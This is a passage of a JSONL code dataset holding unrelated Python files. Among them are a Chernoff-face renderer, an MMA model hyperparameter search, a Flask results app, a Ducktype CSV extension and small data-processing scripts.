pd.DataFrame([table], columns=table.keys())\nprint(df1)\nf = open('out', 'w')\nfor i in table:\n f.write(i)\n f.write(str(table[i]))\n f.write(\"\\n\")\n\n","sub_path":"Practice/lexAnalyze.py","file_name":"lexAnalyze.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"366153424","text":"import sys\nn = int(input())\nfor _ in range(n):\n even = []\n x = list(map(int,sys.stdin.readline().split()))\n for i in x:\n if i % 2 ==0:\n even.append(i)\n print(sum(even), min(even))\n\n","sub_path":"BOJ/boj_3058.py","file_name":"boj_3058.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"552913929","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport random, math\nfrom math import pi\nfrom MySQLDatabaseProxy import MySQLDatabaseProxy\nfrom Requirement import Requirement\nimport RequirementScoreFactory\n\n\nclass ChernoffFace:\n def __init__(self,objtName,dp):\n self.p = RequirementScoreFactory.build(dp.dimensionObject(objtName,'requirement'))\n self.head_radius = 30\n self.eye_radius = 5\n self.eye_left_x = 40\n self.eye_right_x = 60\n self.eye_y = 40\n self.pupil_radius = 1.5\n self.eyebrow_l_l_x = 35\n self.eyebrow_r_l_x = 55\n self.eyebrow_l_r_x = 45\n self.eyebrow_r_r_x = 65\n self.eyebrow_y = 30\n self.nose_apex_x = 50\n self.nose_apex_y = 45\n self.nose_height = 16\n self.nose_width = 8\n self.mouth_y = 65\n\n\n def draw(self, cr, x=0, y=0, width=100, height=100,highlight=False,zoom_ratio=-1):\n reqScore = self.p[0] + self.p[1] + self.p[2]\n if (zoom_ratio == -1) or (zoom_ratio < 0.4 and reqScore < 2) or (zoom_ratio > 0.4):\n self.cr = cr\n self.head_radius = 18\n self.eye_radius = 2.5\n self.eye_left_x = x - 5\n self.eye_right_x = x + 5\n self.eye_y = y - 5\n self.eyebrow_l_l_x = self.eye_left_x - 2.5\n self.eyebrow_r_l_x = self.eye_right_x - 2.5\n self.eyebrow_l_r_x = self.eye_left_x + 2.5\n self.eyebrow_r_r_x = self.eye_right_x + 2.5\n self.eyebrow_y = self.eye_y - 5\n self.nose_apex_x = x\n self.nose_apex_y = y - 3\n self.nose_height = 2\n self.nose_width = 1.5\n self.mouth_y = y + 7\n\n self.x_factor = width / 100.0\n self.y_factor = height / 100.0\n self.x_origin = x\n self.y_origin = y\n\n self.cr.new_sub_path()\n self.xOval(x,y, self.head_radius, self.head_radius)\n\n\n\n eye_spacing = int((0.5 - 0.5) * 10)\n eye_size = int( ((0.5 - 0.5) / 2.0) * 10 )\n e0, e1 = self.eccentricities(self.p[1])\n\n self.cr.new_sub_path()\n self.xOval(self.eye_left_x - eye_spacing, self.eye_y,\n self.eye_radius + eye_size + e0, self.eye_radius + eye_size + e1)\n self.cr.new_sub_path()\n self.xOval(self.eye_right_x + eye_spacing, self.eye_y,\n self.eye_radius + eye_size + e0, self.eye_radius + eye_size + e1)\n\n pupil_size_x = int(max(1, self.p[1] * self.pupil_radius * self.x_factor))\n pupil_size_y = int(max(1, self.p[1] * self.pupil_radius * self.y_factor))\n self.cr.new_sub_path()\n self.xFillOval(self.eye_left_x, self.eye_y,\n pupil_size_x, pupil_size_y)\n self.cr.new_sub_path()\n self.xFillOval(self.eye_right_x, self.eye_y,\n pupil_size_x, pupil_size_y)\n\n y1 = self.eyebrow_y + int((self.p[0] - 0.5) * 10)\n y2 = self.eyebrow_y - int((self.p[0] - 0.5) * 10)\n\n self.xLine(self.eyebrow_l_l_x, y1, self.eyebrow_l_r_x, y2)\n self.xLine(self.eyebrow_r_l_x, y2, self.eyebrow_r_r_x, y1)\n\n y += int(((0.5 - 0.5) / 2.0) * 10)\n self.cr.save()\n self.cr.move_to(self.nose_apex_x, self.nose_apex_y)\n self.cr.line_to(self.nose_apex_x - (self.nose_width / 2), y)\n self.cr.line_to(self.nose_apex_x + (self.nose_width / 2), y)\n self.cr.close_path()\n self.cr.restore()\n\n mouth_size = ((0.5 - 0.5) * 10)\n x1 = self.eye_left_x - mouth_size\n y1 = self.mouth_y\n x2 = self.eye_right_x + mouth_size\n y2 = self.mouth_y\n x3 = ((x2 - x1) / 2) + x1\n y3 = ((self.p[2] - 0.5) * 10) + self.mouth_y\n self.draw_lip(x1, y1, x2, y2, x3, y3)\n\n pen = self.select_pen(highlight)\n self.cr.set_line_width(pen.linewidth)\n self.cr.set_source_rgba(*pen.color) \n self.cr.stroke()\n\n def draw_lip(self, x1, y1, x2, y2, x3, y3):\n x1_2 = x1 ** 2\n x2_2 = x2 ** 2\n x3_2 = x3 ** 2\n denom = (x1_2 * (x2 - x3)) \\\n + (x1 * (x3_2 - x2_2)) \\\n + (x2_2 * x3) \\\n - 
(x3_2 * x2)\n denom = float(denom)\n\n a = ( (y1 * (x2 - x3))\n + (x1 * (y3 - y2))\n + (y2 * x3)\n + -(y3 * x2)\n ) / denom\n\n bb = ( (x1_2 * (y2 - y3))\n + (y1 * (x3_2 - x2_2))\n + (x2_2 * y3)\n - (x3_2 * y2)\n ) / denom\n\n c = ( (x1_2 * ((x2 * y3) - (x3 * y2)))\n + (x1 * ((x3_2 * y2) - (x2_2 * y3)))\n + (y1 * ((x2_2 * x3) - (x3_2 * x2)))\n ) / denom\n\n last_x = int(x1)\n last_y = int(y1)\n for i in xrange(int(x1), int(x2+1)):\n new_x = i\n new_y = int(a * i**2 + bb*i + c)\n self.xLine(last_x, last_y, new_x, new_y)\n last_x = new_x\n last_y = new_y\n\n\n def eccentricities(self, p):\n if p > 0.5:\n return [int((p - 0.5) * 20.0), 0]\n else:\n return [0, int(abs(p - 0.5) * 20.0)]\n\n def xOval(self,x,y,height_r,width_r):\n self.cr.save()\n self.cr.translate(x,y)\n self.cr.scale(width_r, height_r)\n self.cr.arc(0.0,0.0,1.0,0.0,2.0 * pi)\n self.cr.restore()\n\n def xFillOval(self,x,y,height_r,width_r):\n self.cr.save()\n self.cr.translate(x,y)\n self.cr.scale(width_r, height_r)\n self.cr.arc(0.0,0.0,1.0,0.0,2.0 * pi)\n self.cr.restore()\n\n def xLine(self,x1,y1,x2,y2):\n self.cr.save()\n self.cr.move_to(x1,y1)\n self.cr.line_to(x2,y2)\n self.cr.restore()\n","sub_path":"cairis/cairis/ChernoffFace.py","file_name":"ChernoffFace.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"6494935","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom model.mma_features import PcaEloWrapper, BinaryEloWrapper, AccEloWrapper\nfrom sklearn.metrics import log_loss\nfrom model.mma_log_reg_stan import SimpleSymmetricModel\n\n\nclass HyperParamTester(object):\n\n def __init__(self, model):\n self.df = self.prep_dataset()\n self.model = model\n self.static_feat_df = self.get_static_feat_df()\n\n def test_hp_range(self, n_draws):\n results = []\n # for _ in range(n_draws):\n # pca_elo_alpha = np.random.uniform(0, 1)\n # binary_elo_alpha = np.random.uniform(0, 1)\n # acc_elo_alpha = np.random.uniform(0, 1)\n # n_pca = np.random.choice(range(6, 20))\n elo_alpha_vals = np.linspace(0.25, 1, n_draws+2)[1:-1]\n for pca_elo_alpha in [0.55, 0.6, 0.65, 0.7]:\n for binary_elo_alpha in [0.8, 0.85, 0.9, 0.95]:\n for acc_elo_alpha in [0.8, 0.85, 0.9, 0.95]:\n for n_pca in [8, 9, 10, 11]:\n print(f\"\"\"testing the following params:\n pca elo alpha: {pca_elo_alpha}\n bin elo alpha: {binary_elo_alpha}\n acc elo alpha: {acc_elo_alpha}\n n pca components: {n_pca}\"\"\")\n curr_result = self.test_hp(\n pca_elo_alpha, binary_elo_alpha, acc_elo_alpha, n_pca\n )\n print(curr_result)\n results.append(curr_result)\n return pd.DataFrame(results)\n \n def test_hp(self, pca_elo_alpha=0.5, binary_elo_alpha=0.5, acc_elo_alpha=0.5, n_pca=16):\n acc_elo_feat_df = self.get_acc_elo_df(acc_elo_alpha)\n pca_elo_feat_df = self.get_pca_elo_df(pca_elo_alpha, n_pca)\n bin_elo_feat_df = self.get_binary_elo_df(binary_elo_alpha)\n\n feat_df = self.static_feat_df.merge(\n pca_elo_feat_df, on=\"espn_fight_id\", how=\"left\",\n ).merge(\n bin_elo_feat_df, on=\"espn_fight_id\", how=\"left\"\n ).merge(\n acc_elo_feat_df, on=\"espn_fight_id\", how=\"left\"\n )\n\n feat_cols = [\n \"log_height_diff\", \n \"log_reach_diff\", \n \"age_diff\", \n # \"t_since_last_fight_log_diff\", \n \"sqrt_n_career_fights_diff\",\n \"log_t_since_first_fight_diff\",\n \"min_weight_diff\",\n # binary elo cols\n \"pred_win_target_logit\",\n \"pred_fighter_finish_logit\",\n # acc elo cols\n 'pred_logit_p_SML_SMA_diff', \n 
'pred_logit_p_TDL_TDA_diff',\n 'pred_logit_p_KD_SSL_diff', 'pred_logit_p_TDS_TDL_diff',\n ] + [\n # pca elo cols\n f\"pred_PC_{i}\" for i in range(n_pca)\n ]\n \n misc_cols = [\n \"espn_fight_id\",\n \"espn_fighter_id\",\n \"espn_opponent_id\",\n \"Date\",\n \"FighterResult\",\n \"win_target\",\n \"p_fighter_open_implied\",\n \"p_fighter_close_implied\",\n \"FighterOpen\", \n \"OpponentOpen\",\n ]\n\n feat_df = feat_df[misc_cols + feat_cols]\n result = self.eval_model(feat_df, feat_cols)\n result[\"pca_elo_alpha\"] = pca_elo_alpha\n result[\"binary_elo_alpha\"] = binary_elo_alpha\n result[\"acc_elo_alpha\"] = acc_elo_alpha\n result[\"n_pca\"] = n_pca\n return result\n\n def eval_model(self, feat_df, feat_cols):\n train_df = feat_df.dropna(subset=[\"win_target\"])\n print(train_df[feat_cols].isnull().mean())\n y_hat = self.model.fit_predict(train_df, train_df, feat_cols=feat_cols)\n \n xce = log_loss(y_true=train_df[\"win_target\"], y_pred=y_hat)\n\n k = len(feat_cols)\n log_likelihood = len(train_df) * xce * -1\n\n aikake = 2 * k - 2 * log_likelihood # xce is avg negative log likelihood\n return {\n \"in_sample_xce\": xce,\n \"n_params\": k,\n \"aikake\": aikake,\n }\n\n def get_pca_elo_df(self, elo_alpha, n_pca=16):\n pca_ew = PcaEloWrapper(n_pca=n_pca, target_cols=self.diff_cols, alpha=elo_alpha)\n pca_elo_feat_df = pca_ew.fit_transform_all(self.df)\n return pca_elo_feat_df\n\n def get_binary_elo_df(self, elo_alpha):\n elo_alphas = {col: elo_alpha for col in self.bin_cols}\n bin_ew = BinaryEloWrapper(elo_alphas)\n bin_elo_feat_df = bin_ew.fit_transform_all(self.df)\n return bin_elo_feat_df\n\n def get_acc_elo_df(self, elo_alpha):\n elo_alphas = {\n (landed_col, attempted_col): elo_alpha \n for landed_col, attempted_col in zip(self.landed_cols, self.attempted_cols)\n }\n acc_ew = AccEloWrapper(elo_alphas)\n acc_elo_feat_df = acc_ew.fit_transform_all(self.df)\n print(acc_elo_feat_df.isnull().mean())\n return acc_elo_feat_df\n\n def get_static_feat_df(self):\n # pca_elo_feat_df.shape, df.shape\n feat_df = self.df.dropna(subset=[\"p_fighter_open_implied\"]).copy()\n feat_df[\"log_height_diff\"] = (\n np.log(feat_df[\"HeightInches\"]) - np.log(feat_df[\"HeightInches_opp\"])\n ).fillna(0) # if missing from either fighter, impute with 0\n feat_df[\"log_reach_diff\"] = (\n np.log(feat_df[\"ReachInches\"]) - np.log(feat_df[\"ReachInches_opp\"])\n ).fillna(0) # if missing from either fighter, impute with 0\n feat_df[\"age_diff\"] = (feat_df[\"DOB\"] - feat_df[\"DOB_opp\"]).dt.days.fillna(0)\n feat_df[\"t_since_last_fight_log_diff\"] = (\n # if it's the first fight, impute with mean\n np.log(np.maximum(1, feat_df['t_since_prev_fight'].fillna(258))) - \n np.log(np.maximum(1, feat_df['t_since_prev_fight_opp'].fillna(258)))\n )\n\n feat_df[\"log_t_since_first_fight_diff\"] = (\n np.log(np.maximum(1, feat_df['t_since_first_fight'])) - \n np.log(np.maximum(1, feat_df['t_since_first_fight_opp']))\n )\n feat_df[\"sqrt_n_career_fights_diff\"] = (\n np.sqrt(feat_df[\"n_career_fights\"]) - np.sqrt(feat_df[\"n_career_fights_opp\"])\n )\n\n feat_df[\"min_weight_diff\"] = (\n np.log(feat_df[\"min_weight\"]) - np.log(feat_df[\"min_weight_opp\"])\n ).fillna(0)\n return feat_df\n\n def prep_dataset(self):\n df = pd.read_csv(\"data/full_bfo_ufc_espn_data_clean.csv\", parse_dates=[\"Date\", \"DOB\", \"DOB_opp\"])\n stat_landed_cols = [\n 'SCBL', 'SCHL', 'SCLL', 'SGBL', 'SGHL', 'SGLL', 'SDBL', 'SDHL', 'SDLL',\n 'SHL', 'SBL', 'SLL', 'SDL', 'SCL', 'SGL', 'SSL', 'TSL', 'TDL',\n ]\n stat_failed_cols = [\n 'SM_fail', 
'SS_fail', 'TS_fail', 'TD_fail', 'SCB_fail', 'SCH_fail',\n 'SCL_fail', 'SGB_fail', 'SGH_fail', 'SGL_fail', 'SDB_fail', 'SDH_fail',\n 'SDL_fail', 'SH_fail', 'SB_fail', 'SL_fail', 'SD_fail', 'SC_fail',\n 'SG_fail',\n ]\n misc_stat_cols = [\n 'KD', 'RV', 'AD', 'ADTB', 'ADHG', 'ADTM', 'ADTS', 'ctrl_seconds', \n ]\n diff_cols = []\n for stat_col in stat_landed_cols + stat_failed_cols + misc_stat_cols:\n diff_col = f\"diff_sqrt_{stat_col}\"\n df[diff_col] = np.sqrt(df[stat_col]) - np.sqrt(df[stat_col+\"_opp\"])\n diff_cols.append(diff_col)\n self.diff_cols = diff_cols\n\n # defining some binary features\n df[\"win_target\"] = df[\"FighterResult\"].replace({\"W\":1, \"L\":0, \"D\":np.nan})\n\n fight_finish = df[\"decision_clean\"].isin([\"submission\", \"tko/ko\"]).replace({True:1, False:np.nan})\n df[\"fighter_finish\"] = fight_finish * df[\"win_target\"]\n self.bin_cols = [\"win_target\", \"fighter_finish\"]\n \n sm_finish = df[\"decision_clean\"] == \"submission\"\n sm_landed_fighter = (sm_finish & (df[\"FighterResult\"] == \"W\")).astype(int)\n df[\"SML\"] = sm_landed_fighter\n df[\"SMA\"] = np.maximum(df[\"SM\"], df[\"SML\"])\n\n sm_landed_opponent = (sm_finish & (df[\"FighterResult\"] == \"L\")).astype(int)\n df[\"SML_opp\"] = sm_landed_opponent\n df[\"SMA_opp\"] = np.maximum(df[\"SM_opp\"], df[\"SML_opp\"])\n self.landed_cols = [\"SML\", \"TDL\", \"KD\", \"TDS\"]\n self.attempted_cols = [\"SMA\", \"TDA\", \"SSL\", \"TDL\"]\n return df.query(\"Date <= '2021-01-01'\")\n\nif __name__ == \"__main__\":\n mod = SimpleSymmetricModel(feat_cols=None, target_col=\"win_target\", \n p_fighter_implied_col=\"p_fighter_open_implied\",\n beta_prior_std=1.0, mcmc=False)\n hp_tester = HyperParamTester(mod)\n result_df = hp_tester.test_hp_range(n_draws=5)\n print(result_df.sort_values(\"in_sample_xce\"))\n result_df.to_csv(\"data/hp_results_grid_narrower.csv\", index=False)\n","sub_path":"hp_search.py","file_name":"hp_search.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"645917675","text":"\"\"\"\nscript to rank output predictions across various trials\n\n\"\"\"\nimport collections\nimport getopt\nimport os\nimport sys\n\nuser = os.path.expanduser('~')\n\nworking_dir = os.getcwd()\nsys.path.append(working_dir)\n\ntry:\n from common_functions import output_in_text, average_ranking_and_rnn_score\nexcept ImportError:\n from .common_functions import output_in_text, average_ranking_and_rnn_score\n\nhome_dir = os.environ['HOME']\n\n\ndef ranking_wrt_reference(data, ref=''):\n \"\"\"\n ranking_wrt_reference module: read multiple input files and compare original data with the new trial data.\n \"\"\"\n \n rank_dic = collections.OrderedDict()\n ref_file_data = open(ref, 'r').readlines()\n \n for line in ref_file_data:\n line = line.rstrip('\\n')\n seq_i = line.split('\\t')\n rank_dic.update({seq_i[0]: []})\n \n for j in range(0, len(ref_file_data)):\n seq_o = ref_file_data[j].rstrip('\\n').split('\\t')\n rank_dic[seq_o[0]].append([j + 1, seq_o[1]])\n \n for fnc in data:\n if ref not in fnc:\n comp_file_data = open(fnc, 'r').readlines()\n \n for k in range(0, len(comp_file_data)):\n seq_m = comp_file_data[k].rstrip('\\n').split('\\t')\n rank_dic[seq_m[0]].append([k + 1, seq_m[1]])\n \n return rank_dic\n\n\n# following section calls functions defined above and do analysis ######\n\n\ndef show_help():\n print(\"\\n\\n\\t(-: PICKLE TO TXT CONVERSION and RANKING SCRIPT :-)\\n\\n\")\n print(\"Written by:RAVI KUMAR 
VERMA\\n\")\n print(\"\\nUSAGE:\")\n print(\"\\tpython3 rank_and_comparison.py -o outputfilename -i inputfile1 -i inputfile2 -i inputfile3\")\n print(\"\\n\\nOPTIONS:\")\n print(\"\\t-h or --help:\\tprint help\")\n print(\"\\t-o or --ofile:\\tOutput csv filename\")\n print(\"\\t-i or --ifile:\\tInput file names\")\n print(\"\\t\\t\\tIf using multiple input files provide each of their name using \\n\\t\\t\\tflag -i separately. see \"\n \"COMMAND LINE.\\n\")\n print(\"\\nDESCRIPTION:\")\n print(\"\\tScript read the outputs from the rnn.py script saved as pickle (.pkl) and convert them to txt file.\")\n print(\"\\tFile names are derived by replacing '.pkl' with '.txt'.\")\n print(\"\\tIf a single file name is given, the prediction sequences are shorted and printed to the text file based \"\n \"on their score.\")\n print(\"\\tIf more than one pickle file is given, the script will compare the sequence ranks in each of them and \"\n \"will provide an average ranks and scores.\\n\")\n\n\ndef main(argv):\n if argv:\n try:\n opts, argument = getopt.getopt(argv, \"ho:i::\", [\"ofile=\", \"ifile=\"])\n # print opts, argument\n except getopt.GetoptError:\n print('\\n', 'ERROR:', '\\n\\t', 'Check your arguments', '\\n')\n show_help()\n sys.exit(2)\n \n ipf = []\n ofn = ''\n for opt, arg in opts:\n if opt == '-h':\n show_help()\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n ipf.append(arg)\n elif opt in (\"-o\", \"--ofile\"):\n ofn = arg\n \n print('\\n', 'input files :', ipf)\n print('output file name:', ofn)\n \n return [ipf, ofn]\n\n\nif __name__ == \"__main__\":\n args = main(sys.argv[1:])\n pkl_files = args[0]\n out_filename = args[1]\n \n # convert .pkl files to human readable form\n # arr_prediction_txt_file_names = output_in_text(input_array=pkl_files, work_dir=working_dir)\n \n arr_prediction_txt_file_names = [x.replace('.pkl', '.txt') for x in pkl_files]\n ranking_out = ranking_wrt_reference(arr_prediction_txt_file_names, ref=arr_prediction_txt_file_names[0])\n average_ranking_and_rnn_score(ranking_out, o_filename=out_filename, txt_file_names=arr_prediction_txt_file_names)\n","sub_path":"rnn_modular_package/rank_and_comparison.py","file_name":"rank_and_comparison.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"83730213","text":"import sys\n\nlines = []\nfor line in sys.stdin:\n\tlines.append(line.rstrip('\\n'))\n\nres = [] \nfor i in lines[1:]:\n\tif (i.split(\" \")[1] in res):\n\t\tif (i.split(\" \")[0] not in res):\n\t\t\tres.insert(res.index(i.split(\" \")[1]), i.split(\" \")[0])\n\t\telse:\n\t\t\tres.append(i.split(\" \")[0])\n\telse:\n\t\tif (i.split(\" \")[0] not in res):\n\t\t\tres.append(i.split(\" \")[0])\n\t\tif (i.split(\" \")[1] not in res):\n\t\t\tres.append(i.split(\" \")[1])\n\nvalid = True\nfor i in res:\n\tif (res.count(i) > 1):\n\t\tvalid = False\nif valid:\n\tprint (\" < \".join([str(i) for i in res]))\nelse:\n\tprint (\"KO\")","sub_path":"MeilleurDevDeFranceOctobre2019Session1240/3-Cocktail/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"150772731","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\pyWebFramework\\core\\settings.py\n# Compiled at: 2019-11-01 23:14:39\n# Size of source mod 2**32: 
424 bytes\n\n\nclass Settings:\n    ROOT = ''\n    TAX_INIT_SAMPLE_ROOT = ''\n    TEMPLATE_FILE_ROOT = ''\n\n    def load_settings(self, mod):\n        for setting in dir(mod):\n            if not setting.isupper():\n                continue\n            setting_value = getattr(mod, setting)\n            if setting in dir(self):\n                setattr(self, setting, setting_value)\n\n\nsettings = Settings()","sub_path":"pycfiles/PyWebFramework-1.1-py3.7/settings.cpython-37.py","file_name":"settings.cpython-37.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"94027195","text":"import pandas as pd\nimport sys\n\nentity_path = '../../source/Input/HI/Entity.csv'\nvotes_path = '../../source/Input/HI/Votes.csv'\nentity_columns = ['Entity Code Ar' , 'Entity Code En' , 'Entity Code']\n\ndf_entity = pd.DataFrame(pd.read_csv(entity_path , header = 0 ,names =list(entity_columns)))\ndf_entity.drop('Entity Code Ar' , axis =1 , inplace = True)\n\ndf_votes = pd.DataFrame(pd.read_csv(votes_path , header = 0 , names = ['Entity Code' , 'Sentiment' ,'Dates', 'Votes']))\ndf_votes = df_votes[df_votes['Entity Code'].notnull()]\n\ndf_new = pd.merge(df_votes , df_entity, on=['Entity Code'], how ='left')\ndf_all_votes = pd.DataFrame(df_new.groupby(['Entity Code'])['Votes'].sum())\n# Without group\n#df_all_votes = pd.DataFrame(df_new.groupby(['Entity Code'], as_index=False)['Votes'].sum())\n# An apply function can be used along with groupby instead of a calculated field\n\n\ndef getVotes (sentiment_type , df) :\n    sentment = sentiment_type\n    df_votes= pd.DataFrame(df)\n    df_votes= df_votes[df_votes['Sentiment'].isin(list(sentment))]\n    df_votes = pd.DataFrame(df_votes.groupby(['Entity Code'])['Votes'].sum())\n    \n    return pd.DataFrame(df_votes)\n    \n    \n\n\t\n\n#Merge all tables together and create single table\t\ndf_all_votes = df_all_votes.join(getVotes('H', df_new), how = 'outer', lsuffix='_All') \\\n\t\t\t\t\t\t .join(getVotes('U',df_new), how = 'outer', lsuffix='_H') \\\n\t\t\t\t\t\t .join(getVotes('N',df_new), how = 'outer', lsuffix='_U', rsuffix='_N')\ndf_all_votes.reset_index(inplace =True) \ndf_all_votes.fillna(0, inplace=True) # Fill missing values with 0 (dropna() would drop nulls instead)\n\ndf_all_votes['HI %'] = round((((2 * df_all_votes['Votes_H']) + df_all_votes['Votes_N']) / (2 *df_all_votes['Votes_All']))*100,1)\ndf_all_votes['Happy %'] = round((df_all_votes['Votes_H'] / df_all_votes['Votes_All']) * 100,1)\ndf_all_votes['Unhappy %'] = round((df_all_votes['Votes_U'] / df_all_votes['Votes_All']) * 100,1)\ndf_all_votes['Neutral %'] = round((df_all_votes['Votes_N'] / df_all_votes['Votes_All']) * 100,1)\ndf_all_votes['Rank'] = df_all_votes['HI %'].rank(ascending=0)\n\n# High, Medium and Low\n\n\nprint (df_all_votes)\n#Save file to csv\ndf_all_votes.to_csv('../../source/Output/VotesDetails_Join.csv', sep =',')","sub_path":"Code/Data Analysis/HI/HappinessMeter_Join.py","file_name":"HappinessMeter_Join.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"112877765","text":"from flask import render_template, request, redirect, url_for\nfrom flask_login import current_user\n\nfrom application import app, db, login_manager, login_required\nfrom application.tulokset.models import Tulos\nfrom application.kilpailut.models import Kilpailu\nfrom application.kilpailijat.models import Kilpailija\nfrom application.tulokset.forms import TulosForm\n\n# Deliver the selected competition's info for the creation 
form\n@app.route(\"/tulokset/new/<kilpailu_id>/\", methods=[\"GET\"])\n@login_required(role=\"admin\")\ndef tulokset_form(kilpailu_id):\n    kilpailu = Kilpailu.query.get(kilpailu_id)\n    return render_template(\"tulokset/new.html\", form = TulosForm(obj=kilpailu_id), kilpailu=kilpailu)\n\n# Fetch the competition's results by competition id and build the taulukko.html content\n@app.route(\"/tulokset/<kilpailu_id>/\", methods=[\"GET\"])\ndef tulokset_show(kilpailu_id):\n    return render_template(\"tulokset/taulukko.html\", kilpailun_Tulokset=Tulos.kilpailunTulokset(kilpailu_id), kilpailun_Tiedot=Tulos.kilpailunTiedot(kilpailu_id))\n\n# Fetch a single result's data by id and open it for editing\n@app.route(\"/tulokset/edit/<tulokset_id>/\", methods=[\"GET\"])\ndef tulokset_show_edit(tulokset_id):\n    tulosRivi = Tulos.query.get(tulokset_id)\n    return render_template(\"tulokset/edit.html\", form=TulosForm(obj=tulosRivi), tulokset=tulosRivi )\n\n# Read the creation data from the form and create a new Tulos object\n@app.route(\"/tulokset/new/<kilpailu_id>/\", methods=[\"POST\"])\n@login_required(role=\"admin\")\ndef tulokset_create(kilpailu_id):\n    form = TulosForm(request.form)\n    kilpailu = Kilpailu.query.get(kilpailu_id)\n\n    if not form.validate():\n        return render_template(\"tulokset/new.html\", form=form, kilpailu=kilpailu)\n\n    kilpailuID = kilpailu_id\n    kilpailijaID = request.form.get('kilpailija_id', type=int)\n    tulos = Tulos(form.sijoitus.data, form.pisteet.data, kilpailuID, kilpailijaID)\n\n    db.session().add(tulos)\n    db.session().commit()\n\n    return redirect(url_for(\"kilpailut_index\"))\n\n# Read the data from the edit form and save it to the database\n@app.route(\"/tulokset/edit/<tulokset_id>/\", methods=[\"POST\"])\n@login_required(role=\"admin\")\ndef tulokset_edit(tulokset_id):\n    form = TulosForm(request.form)\n    tulos = Tulos.query.get(tulokset_id)\n\n    if not form.validate():\n        return render_template(\"tulokset/edit.html\", form=form, tulokset=tulos)\n\n    kilpailu_id = tulos.kilpailu_id\n\n    tulos.pisteet = form.pisteet.data\n    tulos.sijoitus = form.sijoitus.data\n    tulos.kilpailija_id = request.form.get('kilpailija_id', type=int)\n\n    db.session().commit()\n\n    return redirect(url_for(\"tulokset_show\",kilpailu_id=kilpailu_id))\n\n# Delete a single result row by its id\n@app.route(\"/tulokset/delete/<tulokset_id>/\", methods=[\"POST\"])\n@login_required(role=\"admin\")\ndef tulokset_delete(tulokset_id):\n    tulos = Tulos.query.get(tulokset_id)\n    kilpailu_id = tulos.kilpailu_id\n    db.session().delete(tulos)\n    db.session().commit()\n\n    return redirect(url_for(\"tulokset_show\", kilpailu_id=kilpailu_id))","sub_path":"application/tulokset/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"202709021","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/mallard/ducktype/extensions/csv.py\n# Compiled at: 2019-03-23 09:49:43\n# Size of source mod 2**32: 3062 bytes\nimport mallard.ducktype\n\nclass CsvExtension(mallard.ducktype.parser.ParserExtension):\n\n    def __init__(self, parser, prefix, version):\n        if version == 'experimental':\n            self.version = version\n        else:\n            raise mallard.ducktype.parser.SyntaxError('Unsupported csv extension version: ' + version, parser)\n        self.parser = parser\n        self.prefix = 
prefix\n self.version = version\n self.table = None\n\n def take_block_node(self, node):\n if node.name != 'csv:table':\n return False\n self.table = mallard.ducktype.parser.Block('table')\n self.table.is_greedy = False\n self.parser.current.add_child(self.table)\n self.parser.current = self.table\n return True\n\n def parse_line_block(self, line):\n if self.table is None:\n return False\n if self.table is not self.parser.current:\n self.table = None\n return False\n tr = mallard.ducktype.parser.Block('tr')\n self.parser.current.add_child(tr)\n cells = line.split(',')\n for cell in cells:\n td = mallard.ducktype.parser.Block('td')\n tr.add_child(td)\n tdp = mallard.ducktype.parser.Block('p')\n td.add_child(tdp)\n tdp.add_text(cell)\n\n return True","sub_path":"pycfiles/mallard_ducktype-1.0.2-py3.7/csv.cpython-37.py","file_name":"csv.cpython-37.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"470116718","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on ...\r\n\r\n@author: damevski\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy\r\nimport os\r\nimport gensim\r\nfrom gensim.scripts.glove2word2vec import glove2word2vec\r\n\r\nclass Semantic_Feature:\r\n\r\n def __init__(self):\r\n script_dir = os.path.dirname(__file__)\r\n embedding_file = os.path.join(script_dir, 'embeddings/vectors.txt')\r\n w2v_embedding_file = os.path.join(script_dir, 'embeddings/w2v_vectors.txt')\r\n if not os.path.exists(w2v_embedding_file):\r\n glove2word2vec(embedding_file, w2v_embedding_file)\r\n self.model = gensim.models.KeyedVectors.load_word2vec_format(w2v_embedding_file)\r\n 